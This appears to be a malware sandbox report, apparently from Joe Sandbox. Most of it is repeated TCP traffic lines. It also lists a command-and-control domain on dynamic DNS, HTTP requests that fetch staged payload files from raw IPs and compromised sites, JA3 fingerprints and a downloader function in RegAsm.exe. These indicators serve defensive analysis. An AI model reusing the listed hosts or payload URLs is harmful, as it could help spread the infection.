Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 104.168.45.34:80

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: iwarsut775laudrye2.duckdns.org

Uses dynamic DNS services

Source: unknown

DNS query: name: iwarsut775laudrye2.duckdns.org

Source: createdthingstobefrankwithmeeverywhere[1].gif.10.dr	Binary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
Source: createdthingstobefrankwithmeeverywhere[1].gif.10.dr	Binary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4
Source: createdthingstobefrankwithmeeverywhe.vBS.10.dr	Binary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
Source: createdthingstobefrankwithmeeverywhe.vBS.10.dr	Binary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4

Source: global traffic	HTTP traffic detected: GET /os/transportment.pfm HTTP/1.1Host: asociatiatraditiimaria.ro
Source: global traffic	HTTP traffic detected: GET /wp-admin/oserve/transportment.pfm HTTP/1.1Host: new.quranushaiqer.org.saConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Upload/vbs.jpeg HTTP/1.1Host: 198.46.176.133Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /59/LMTS.txt HTTP/1.1Host: 104.168.45.34Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Joe Sandbox View	JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1

Source: global traffic	HTTP traffic detected: GET /Oi8 HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: hq.axConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /os/transportment.pfm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: asociatiatraditiimaria.roConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Oi8 HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: hq.axConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /59/bn/createdgoodthingstogetmebacktheentirethingsinolineswitchtogilfrnfboobstounderstandhowfeelurareinthesituation_____________creanthesituationgirlfrnd.doc HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.45.34Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /59/createdthingstobefrankwithmeeverywhere.gIF HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.45.34Connection: Keep-Alive

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49169 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49172 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49178 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49179 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49180 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49182 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.45.34

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 16_2_0041B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

16_2_0041B380

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F697BD29.emf

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /Oi8 HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: hq.axConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /os/transportment.pfm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: asociatiatraditiimaria.roConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /os/transportment.pfm HTTP/1.1Host: asociatiatraditiimaria.ro
Source: global traffic	HTTP traffic detected: GET /wp-admin/oserve/transportment.pfm HTTP/1.1Host: new.quranushaiqer.org.saConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Oi8 HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: hq.axConnection: Keep-Alive
